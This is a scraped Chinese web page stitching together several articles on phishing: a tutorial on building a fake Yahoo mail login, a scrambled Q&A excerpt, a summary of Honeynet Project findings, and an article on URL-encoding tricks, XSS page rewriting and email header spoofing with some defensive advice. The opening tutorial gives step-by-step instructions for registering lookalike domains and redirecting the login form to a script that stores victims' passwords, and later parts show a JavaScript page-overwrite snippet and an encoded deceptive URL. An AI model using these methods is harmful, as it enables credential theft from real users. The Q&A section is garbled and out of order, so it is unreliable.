网络钓鱼攻击有哪些攻击方法

当前位置:> >
详解网络钓鱼的实现与防范技巧
详解网络钓鱼的实现与防范技巧
    网络钓鱼因其严重危害网民利益和互联网信誉体制,越来越多地受到人们的关注,国际上已经成立反网络钓鱼工作小组(APWG,Anti-Phishing Working Group),这是一个联合机构,拥有大约800名成员,他们来自约490家金融服务公司、技术公司、服务提供商、国家法律执行机构和立法机构,这些机构的职责是向产业股份持有人提供一个保密论坛以讨论网络钓鱼问题。反网络钓鱼工作小组通过召开会议以及成员之间的电子形式的讨论,努力从硬成本和软成本两个方面来定义网络钓鱼的范围,分享信息和最佳操作模式以消除存在的问题,希望在不久的将来,彻底消灭网络钓鱼陷阱,还给大家一个真诚、诚信的互联网。
  一. 钓鱼的原理:
  网络钓鱼(Phishing)一词,是&Fishing&和&Phone&的综合体,由于黑客始祖起初是以电话作案,所以用&Ph&来取代&F&,创造了&Phishing&,Phishing 发音与 Fishing相同。 &网络钓鱼&就其本身来说,称不上是一种独立的攻击手段,更多的只是诈骗方法,就像现实社会中的一些诈骗一样。攻击者利用欺骗性的电子邮件和伪造的Web站点来进行诈骗活动,诱骗访问者提供一些个人信息,如信用卡号、账户用和口令、社保编号等内容(通常主要是那些和财务,账号有关的信息,以获取不正当利益),受骗者往往会泄露自己的财务数据。
  现在网络钓鱼的技术手段越来越复杂,比如隐藏在图片中的恶意代码、键盘记录程序,当然还有和合法网站外观完全一样的虚假网站,这些虚假网站甚至连浏览器下方的锁形安全标记都能显示出来。网络钓鱼的手段越来越狡猾,这里首先介绍一下网络钓鱼的工作流程。通常有五个阶段:
  1. 钓鱼者入侵初级服务器,窃取用户的名字和邮件地址
  2. 钓鱼者发送有针对性质的邮件3. 受害用户访问假冒网址
  4. 受害用户提供秘密和用户信息被钓鱼者取得
  5. 钓鱼者使用受害用户的身份进入其他网络服务器
  关于恶意垃圾邮件,想必大家都很了解了,这里我们要实现和操作的是第三种,伪造目标网站,使目标用户访问假冒网站,从而完成我们的欺骗。
  二. 实现方法
  下面我们实现一个简单的网页钓鱼页面,大家可以根据自己的需要添加和修改。
  1.首先我们申请一个空间,在空间上用来存放我们的网页
  2.我们再申请一个域名,为了达到欺骗效果,我们可以申请一些名字和我们要欺骗的网站类似的域名:如: www.yahoo.com 我们申请一个 www.yaho.com等
  如果不能申请这些顶级域名的话,我们也可以修改我们的二级域名
  如:我们自己的域名是tcbmail.com,我们可以添加一个yahoo.tcbmail.com的二级域名,这样可以增加欺骗的成功率
  将我们的空间地址绑定到我们的域名上
  3.选取目标,修改代码。
  下面我们看一下我们要欺骗的目标,这里我们以yahoo为例,其他网站我们也可以采取类似办法
  打开yahoo邮件的主页:https://login.yahoo.com/config/mail?.intl=us
  查看其原代码,我们看到这样一句话
  https://login.yahoo.com/config/login?& autocomplete=&off& name=&login_form& onsubmit=&return
  hash2(this)&&
  这句话的意思就是将我们输入的表单项的值提交到后台的处理网页https://login.yahoo.com/config/login?呵呵,这里就给我们提供了机会,我们可以仿造一个yahoo的邮件的主页,将提交后的页面换成我们自己的页面,通过后台数据库处理,就可以达到截获目标帐户密码的效果。
  下面我们就具体操作一下
  将yahoo邮件的主页保存到本地
  P&https://login.yahoo.com/config/login?& autocomplete=&off& name=&login_form& onsubmit=&return
  hash2(this)&&
  修改为
  {FORM method=&post& action=&http://我们自己 域名/test.asp& target=_self}
  保存为mail.html
  4.编写test.asp,使其完成将输入的值存储到我们对应的数据库中,这里我们可以直接使用access数据库利用以下代码就可以完成我们的目的
  5.将编辑好的mail.html、test.asp以及我们编辑好的pass.mdb上传到空间中
  访问http://我们自己的域名/mail.html
  是不是就看到yahoo的邮箱主页
  当你输入用户名、密码的时候,对应的输入已经存储到我们自己的数据库pass.mdb中了,欺骗成功.
  当然啦,现在大家的安全意识都比以前强了,如果大家留意我们所发的链接时,有些细心的朋友还是会注意到网页和实际的不同
  但是如果你的域名欺骗性比较大的话,你的成功性也会比较大
  如:http://mail.yaho.com.cn/mail.html看起来是不是很像
  或者添加一个二级域名
  如:http://yahoo.duay.com/mail.html也可以起到一个不错的欺骗效果
  如果你申请的域名类似于www.tiger.com那我们该如何处理呢?
  下面再简单介绍几种URL欺骗的方法
------分隔线----------------------------
杀毒软件下载排行
要防范黑客攻击,首先要了解黑客攻击的一般步骤,只有了解了黑客攻击的原理、步骤、方...
介绍微软系统漏洞WMI的攻击与防御方法。...钓鱼式攻击的网钓技术_百度知道
钓鱼式攻击的网钓技术
我有更好的答案
然而,利用链接别名工具如TinyURL。这样的漏洞于2006年曾被用来对付PayPal,而这网页与RapidShare的“免费用户或高级用户 (free user or premium user)”页看来很像。如果受害人选择免费用户,网钓者只是将它们传递给真正的RapidShare网站、可能是恶意的网站上。另一种常见的伎俩是使锚文本链接似乎是合法的。拼写错误的网址或 使用子网域是网钓所使用的常见伎俩。一些网钓诈骗使用 JavaScript 命令以改变地址栏。这由放一个合法网址的地址栏图片以盖住地址栏,或者关闭原来的地址栏并重开一个新的合法的URL达成。攻击者甚至可以利用在信誉卓著网站自己的脚本漏洞对付受害者,但它没有专业知识要发现是非常困难的,不管给定的用户名为何。这种网址在 Internet Explorer 中被禁用,网钓是相当寻常以获得高级帐号手段,从而移除下载速度限制,售价比RapidShare的高级帐户便宜。鉴别一个RapidShare网钓网页的最简单方式是使用 Mozilla Firefox,右击别名页,并选择“This Frame” & “Show only this frame”。这将揭露真正的网页,您可以看到网址不是.您的银行,连到不同的。这一类型攻击(也称为跨网站脚本)的问题尤其特别严重;@&#39。但是,如果他们选择的高级帐户,那么网钓网站 的将在他们进行下载之前登记其登入信息。到此阶段、上传自动删除、下载前等候、以及下载间的时间间隔,网钓者已经开始利用 Flash 构建网站。 这些看起来很像真正的网站,但把文本隐藏在多媒体对象中。 在 PayPal 网钓示例里(见右),电子邮件里的拼写错误以及非 PayPal 网域链接的存在(显示在状态栏红 色框里)都是线索,指出这是一个网钓的企图。另一种网钓法是无个人问候的赠品,尽管显示的个人数据并不保证其正当性。一个合法的PayPal通信总是以用 户的真实姓名问候。在下面的网址例子里。而实际上,链接到该网站是经过摆弄来进行攻击,因为它们导引用户直接在他们自己的银行或服务的网页登入,在这里从网络地址到安全证书的一切似乎是正确的,它提供了一个简单易用的界面让网钓者以令人信服地重制网站、以及威胁收信人若不遵照信息指示办理的话会遭帐号停用的处分。请注意,许多网络网钓电子邮件会如同来自PayPal的一封真正的电子邮件般包括一则永不将您的密码泄漏以防网钓攻击的重大警告。还有一种由RSA信息安全公司发现的万用中间人网钓包.baidu,PayPal绝对不会要求您提供敏感信息,以“确认”其帐户;这一步将导引这些受害人进一 步造访网钓网站,其设计看起来与PayPal网站很像。而在那里会问这些受害人的个人机密信息,并让用户选择继续到该站浏览或取消。还有一个已发现的问题在网页浏览器如何处理国际化域名 (International Domain Names,下称IDN),网钓者已从受害者偷走了高级帐户信息,而非一个普通的问候如: “敬启者”, 他们可以伪装成实际上真正网页寄存在别的地方的网址。钓来的RapidShare帐户通常拿来转卖、“亲爱的用户”(Dear Accountholder);实际上这个网址指向了“示例”网站的“您的银行”(即网钓)子网域,是使得该网钓电子邮件如此虚伪以便欺骗。在这个例子里,而它实际上导引浏览器指向上的某页,以用户名该页面会正常开启,网钓者冒着类似的风险利用信誉良好网站上的网域名称转址服务来掩饰其恶意网址。 一旦受害者访问网钓网站,<img class="ikqb_img" src="http://e.hiphotos。 在RapidShare的网页主机
为您推荐:
其他类似问题
您可能关注的内容
&#xe675;换一换
回答问题,赢新手礼包&#xe6b9;
个人、企业类
违法有害信息,请在下方选择后提交
色情、暴力
我们会通过消息、邮箱等方式尽快将举报结果通知您。天极传媒:天极网全国分站
您现在的位置:
& >>网络钓鱼揭秘:钓鱼者的三种典型攻击手段
网络钓鱼揭秘:钓鱼者的三种典型攻击手段
TechTarget 10:29
  在大多数人的印象中,就是那些欺骗人们提供银行账户或身份信息的假冒电子邮件。然而,据蜜网项目组&蜜网研究联盟(Honeynet Project & Research )最近发表的研究报告显示,网络钓鱼要比这更复杂和更可怕。
  该联盟在这份最新的研究报告中警告说,网络钓鱼者正在使用恶意的网络、端口重新定向和成功率相当高的蜜网诱骗用户上钩。他们的努力比人们最初想象的更周密而且更有组织性。在许多情况下,他们与的钓鱼团伙协调作业并且同时采用多种手段。
  蜜网研究人员Arthur Clune在谈到这篇报告中的一个攻击的例子时说,这种站的建立速度是非常快的。所有这些网站都是事先准备好的。建立这种网站的人显然已经做好了准备,因为在这个网站还没有完全建好之前我们就开始看到有了。包括扫描有漏洞的网络服务器等活动在内所有的过程都是高度自动化的。这一切都表明,攻击者是认真的、做好准备的并且要尽可能多地寻找有漏洞的主机。
  Clune说,这类网站的质量和滥发邮件的做法正在改善。这类网站使用更规范的英语并且嵌入了质量更,使之在外表上更像是真正的网站。另一位研究人员David Watson则说,随着用户越来越了解网络钓鱼以及网络钓鱼的手段,攻击者不得不改进他们的方法。他说,受到这种攻击的人数之多使他感到意外。
  Watson说,在我们调查的许多诈骗事件中,我们吃惊地发现,用户确实会访问那些假冒的钓鱼网站。指导如何安全使用互联网的信息显然没有普及到最终用户。
  这项研究是使用蜜罐进行的。所谓蜜罐指故意设置为没有保护措施的。当受到攻击时,研究人员可以对这些攻击进行研究,更好地了解攻击者使用的策略。在蜜罐上,研究人员清楚的观察到钓鱼者成功地使用了三种不同的攻击手段:
  攻破网络服务器
  第一种方法是攻破有的服务器并且安装恶意的网页内容。在一次典型的钓鱼攻击中,攻击者使用了如下方法:
  ?扫描有安全漏洞的服务器;
  ?攻破有漏洞的服务器并且安装一个工具集或者口令保护后门;
  ?通过加密的后门进入那台被攻破的服务器;
  ?下载事先制作好的钓鱼网站,防止被攻破的服务器是基于网络的服务器;
  ?进行有限的内容配置和网站,当首次访问这个网站服务器时有可能会暴露他们真正的IP地址;
  ?下载大量发送电子邮件的工具,使用这种工具利用为这个假冒的网站做广告;
  ?通过上述步骤之后,开始有人访问这个钓鱼网站,并且潜在的受害者开始访问这个网站的内容。
  这个联盟在声明中说,从系统首次连接到互联网算起,这种攻击通常只有几个小时或者几天的时间。研究发现,攻击者经常是对许多台服务器和许多机构同时发起攻击。
  端口重新定向
  这是第二种攻击方法。据称,日,一个攻击者利用 Linux 系统的安全漏洞成功地进入了一个蜜罐。
  研究人员称,这个攻击事件有点不同寻常。攻击者突破了之后并没有直接上载钓鱼的内容。取而代之的是攻击者在蜜罐中安装并且配置了一个端口重新定向服务。这个端口重新定向服务旨在把发送到蜜罐网络服务器的以透明的方式重新到另外一台远程服务器,使人们很难跟踪内容来源的位置。
  研究人员说,攻击者随后在蜜罐服务器中下载和安装一个名为“redir”的端口重新定向工具软件。这个工具软件旨在透明地把进入蜜罐服务器的TCP连接发送到一个远程主机。攻击者设置这个软件,以便把所有通过TCP 80端口进入蜜罐服务器的通信重新定向到在的一台远程网络服务器的TCP 80端口。
  这是第三种钓鱼攻击方法。在2004年9月至2005年1月期间,德国蜜网计划部署了一系列没有使用补丁的基于的蜜罐,以观察蜜网的活动情况。在此期间,发生了100多起单独的蜜网活动。
  研究人员表示,他们捕获的某些版本的蜜罐软件能够远程启动在被攻破的服务器中的代理。
  研究报告则称,如果访问这个蜜网的攻击者能够启动远程蜜罐服务器中的代理功能,这台服务器就能够被用来发送大量的垃圾电子邮件。如果一个蜜网包含大量的被攻破的主机,攻击者就可以非常容易地从毫不察觉的家庭用户拥有的大量的IP地址发送大量的电子邮件。
  资源丰富的蜜网的拥有者利用蜜网从事犯罪活动也许不会使人们感到意外。现在是租用蜜网的时候了。蜜网的经营者将向客户出售具有 v4功能的服务器IP地址和端口的列表。有很多证明,有人把蜜网出售给垃圾邮件制造者作为转发垃圾邮件的工具。
  在挑选了上述这些攻击方法之后,研究人员做出结论称,钓鱼攻击能够很快地发生。从首次入侵服务器到在网络上建起钓鱼网站只需要非常短的时间。这就使网络钓鱼很难跟踪和预防。这篇研究报告显示,许多钓鱼攻击都是同时采取多种手段、组织得非常复杂并且经常联合采用上面介绍的手段。
  IT管理员应该做什么?
  Watson指出,黑客经常扫描大量的IP地址,寻找可以攻击的有漏洞的主机。这种扫描活动是不分青红皂白的。漏洞最多的服务器将首先被黑客找到。因此,员要采取最佳的安全做法并且的安全漏洞,使用并且执行严格的措施,或者封锁不必要的进入服务器的连接。
  蜜网研究人员Clune赞同这个观点,并且对IT管理员提出如下建议:
  提高警惕。钓鱼网站从建立到开始活动是很快的。这些人预计这种钓鱼网站存在时间很短,因此,需要建立很多这类网站。钓鱼网站虽然存在的时间短,但是,在被发现之前造成的损失是很大的,特别是在周末。
  对简单的事情也要加小心。阻止直接发出的简单邮件传输协议进入你所有的机器以及进入服务器的HTTP/HTTPS请求等简单的事情使你的服务器不容易被黑客利用,从而使黑客转向其它容易利用的服务器。通过你的强制执行简单邮件传输协议并且同时运行查找垃圾邮件的软件可能会完全阻止你的服务器发送垃圾电子邮件。从信誉的角度说,这是一种很好的方法。 &&阅读关于
的全部文章
(作者:赵彪责任编辑:原野)
天极新媒体&最酷科技资讯扫码赢大奖
* 网友发言均非本站立场,本站不在评论栏推荐任何网店、经销商,谨防上当受骗!
Win10系统在Win8的基础上对界面、特性以及跨平台方面做了诸多优化。
手机整机DIY企业级
pc软件手机软件如何防范网络钓鱼攻击
如何防范网络钓鱼攻击?
网络钓鱼形势分析
IE7浏览器开始加入反钓鱼功能,这个功能成为浏览器安全功能的一个选项 - 仿冒网站筛选器。各类IM软件,如QQ等开始出现提示用户防止被网络钓鱼的安全信息。电子商务、门户、SNS、BLOG等大部分Web2.0热门网站,也 开始公告用户防止被网络钓鱼的安全信息。
在传统的利用系统漏洞和软件漏洞进行入侵攻击的可能性越来越小的前提下,网络钓鱼已经逐渐成为黑客们趋之若鹜的攻击手段。同时无论网络相关的客户端软件还是大型的Web网站都开始发觉网络钓鱼已经成为了一个严峻的问题,并积极防御。
1 网络钓鱼原理分析
网络钓鱼属于社会工程学攻击的一种,简单的描叙就是通过伪造信息获得受害者的信任并且响应,由于网络信息是呈爆炸性增长的,人们面对各种各样的信息往往难以辨认真伪,依托网络环境进行钓鱼攻击是一种非常可行的攻击手段。
网络钓鱼从攻击角度上分为两种形式,一种是通过伪造具有&概率可信度&的信息来欺骗受害者,这里提到了&概率可信度&这个名词,从逻辑上说就是有一定的概 率使人信任并且响应,从原理上说,攻击者使用&概率可信度&的信息进行攻击,这类信息在概率内正好吻合了受害者的信任度,受害者就可能直接信任这类信息并 且响应。而另外一种则是通过&身份欺骗&信息来进行攻击,攻击者必须掌握一定的信息,利用人与人之间的信任关系,通过伪造身份,使用这类信任关系伪造信 息,最终使受害者信任并且响应。
相信大家也经常遇到第一种形式的网络钓鱼攻击,比如形形色色的虚假中奖信息等。在今天这个Web2.0大行其道的网络上,使用Google、百度来查询姓 名都有可能得到真实的信息,大型的SNS网络社区一个名字就能查询出和你所有相关的人的敏感信息,个人隐私几乎都已经不复存在,如果这类敏感信息被用作第 二种形式的钓鱼攻击,后果将不堪设想。同时这两种形式的攻击原理也被常用作web蠕虫的传播手段,比如利用web应用的消息功能传播蠕虫链接和恶意代码 等,当你收到朋友的信息可能就会直接打开、浏览,蠕虫得以进一步的传播。这里因为网络钓鱼的敏感性,我就不再列举其他实例,下面介绍一些可以被用作网络钓鱼的Web攻击技术。
2 URL编码结合钓鱼技术
首先我们要明晰一个概念,浏览器除了支持ASCII码字符的URL,还支持ASCII码以外的字符,同时支持对所有的字符进行编码。URL编码就是是将字符转换成16进制并在前面加上&%&前缀, 比如我们将GOOGLE的域名后缀.cn进行URL编码:
http://www.google%2E%63%6E
&.cn&这三个字符就是以每个字符的16进制形式加上&%&前缀,浏览器和服务端都能够正常支持。原理分析到这,一个攻击者是怎么通过URL编码 进行钓鱼攻击呢?我们知道钓鱼攻击者常用的攻击伎俩就是混淆URL,通过利用相似的域名和内容来骗取受害者的信任,这里就存在一个相似度的值,通过URL 编码就能提高URL的相似度,假如我们拥有任意一个y19ml1.cn这样的垃圾域名,使用子域名配合URL编码就能提高相似度,比如先制造一个 http://www.google.cn.y19ml1.cn的子域名,通过URL编码我们将得到如下URL:
http://www.google.cn%2E%79%31%39%6D%6C%31%2E%63%6E
可以想象,一个普通用户在浏览信任度极高的网站时,被攻击者使用&概率可信度&信息和&身份欺骗&信息配合相似度极高的URL,在惯性思维下很难分辨一个URL的真伪。
3 Web漏洞结合钓鱼技术
近两年来,XSS漏洞开始成为Web漏洞中的一个大热门,XSS漏洞的特性就是能够在网页中插入javascript运行,javascript几乎能做 任何事情,传统的XSS漏洞攻击可能是直接获取客户端和服务端的会话,可能是制作Web蠕虫攻击整个Web服务业务,撇开利用XSS漏洞针对Web服务进 行直接攻击的风险,XSS漏洞还能被用作钓鱼攻击!为了更深入了解XSS钓鱼的危害,我这里举一个简单的例子,网页中被插入任意的javascript运 行,是能够做到直接篡改页面的,将如下的javascript代码放入任何一个已有内容的网页,将清空原有内容被写入任意内容。
window.onload=function Phish(){
document.open();
document.clear();
document.write(&Phshing Attack By 80sec&);
document.close();
当钓鱼攻击者利用网站的Web漏洞进行钓鱼,网站管理员到这里应该意识到问题的严重性,这类钓鱼攻击并不是针对网站的Web服务业务进行攻击,而是利用网 站的信任度对网站所有的用户进行攻击!当用户进入自己信任的网站而浏览的却是钓鱼网页,我想对网站的打击是无法评估的。
4 伪造Email地址结合钓鱼技术
伪造Email地址乍看起来很困难,但是经常接触邮件服务器的技术人员应该知道,我们是可以通过邮件代理服务器发送匿名邮件的,在没有邮件代理服务器的情 况下可以在本地架设服务器发送匿名邮件,甚至可以直接利用WEB脚本程序使用虚拟主机、WEB服务器的邮件服务发送匿名邮件。通过邮件代理服务器可以直接 修改邮件原始信息中MIME头的FROM字段,也就是发件人地址,利用这种匿名邮件可以伪造任何人的身份发送邮件。如下面的部分原始邮件头信息:
Received: from localhost (unknown [210.191.163.131])
by 192,168.1.1 (Postfix) with ESMTP id 8D20F606002
Tue, 23 Dec :08 +0800 (CST)
Subject: 中奖了!
MIME-Version: 1.0
From: &admin&
MIME头中的FROM字段是可以控制的,我们这里伪造成了的地址,而现在所有的邮件服务商对这类匿邮件并没有提 供防护措施,造成的后果是一个钓鱼攻击者能够伪造任何人、任何官方的身份发送钓鱼邮件,而一个普通用户是完全无法辨认信息真伪的。
5 浏览器漏洞结合钓鱼技术
浏览器的地址栏欺骗漏洞和跨域脚本漏洞可以实现完美的钓鱼攻击,地址栏欺骗漏洞实现的效果就是攻击者可以在真实的URL地址下伪造任意的网页内容,跨域脚 本漏洞实现的效果是可以跨域名跨页面修改网站的任意内容,当我们访问一个URL返回给却是攻击者可以控制的内容,如果这里伪造是一个钓鱼网页内容,普通用 户将无从分辨真伪。浏览器的相关漏洞,具体可以参考liudieyu发现的Chrome浏览器地址栏欺骗漏洞、80sec发现的ms08-058和第三方 浏览器的部分漏洞。
这种钓鱼攻击是最严重的,因为这类攻击利用的是客户端软件漏洞,完全不受服务端程序和网络环境的限制,是网站管理员无法控制的,大家只能在知道漏洞的情况下积极打上软件补丁,或使用安全软件修补客户端软件的漏洞。
6 如何防范网络钓鱼攻击
网络钓鱼攻击从防范的角度来说也可以分为两个方面,一个方面是对钓鱼攻击利用的资源进行限制,一般钓鱼攻击所利用的资源是可控的,比如WEB漏洞是Web 服务提供商可以直接修补的,比如邮件服务商可以使用域名反向解析邮件发送服务器提醒用户是否收到匿名邮件,比如利用IM软件传播的钓鱼URL链接是IM服 务提供商可以封杀的。另外一个方面是不可控制的行为,比如浏览器漏洞,大家就必须打上补丁防御攻击者直接使用客户端软件漏洞发起的钓鱼攻击,各个安全软件 厂商也可以提供修补客户端软件漏洞的功能。同时各大网站有义务保护所有用户的隐私,有义务提醒所有的用户防止钓鱼,提高用户的安全意识,从两个方面积极防 御钓鱼攻击。
7 内容关键字匹配URL主动检测钓鱼攻击
现在的网络钓鱼攻击并未做到主动防御,不过欣慰的是可以看到国内如QQ等IM软件,开始提醒用户不要打开未知的不可信的链接,防止用户被欺骗。网络钓鱼攻 击还可以通过内容关键字匹配URL进行主动检测,我们知道现在网络上的网页木马等恶意代码横行,杀毒软件提供了查杀网页恶意代码的功能,这类查杀方式最初 是使用恶意代码关键字特征进行查杀,而网络钓鱼也是拥有钓鱼关键字,这些关键字大都具有趋利性质,充满了大量的虚假信息,这类信息也是具有特征的,比如中 奖、各类银行账号、虚假电话号码等,我们可以按照杀毒软件的模式建立起一个钓鱼的关键字特征库配合URL特征进行匹配分析,在一定程序上主动检测或防御钓 鱼攻击。
除开使用Web攻击技术进行钓鱼,攻击者还可以使用网络协议漏洞进行钓鱼,比如大家已知的ARP攻击、DNS劫持、DHCP劫持漏洞等,总之网络攻击技术 是层出不穷的,但防御手段也会随着攻击技术不断更新,只有保持积极防御的态度才能做到最大化的防御。另外补充一点,我国对于网络钓鱼诈骗的立法还不够完善,一些网络钓鱼诈骗在定罪量刑时仍沿用了传统的对定罪量刑标准,不能体现网络犯罪等新型犯罪的特点,比如诈骗金额在2000元以下的罪案并没有在刑法中 量刑,这对于网络钓鱼诈骗金额的小额多量的分布式特性是无法很好的取证的,希望国家能进一步完善相关法律。
阅读本文后您有什么感想? 已有
人给出评价!
11-05-3011-05-3010-08-1710-03-2310-02-1108-11-2508-11-1904-10-07
注:您的评论需要经过审核才会显示出来
没有查询到任何记录。
Copyright &
PC6下载(www.pc6.com).All Rights Reserved
备案编号:湘ICP备号}

我要回帖

更多关于 网络攻击方法 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信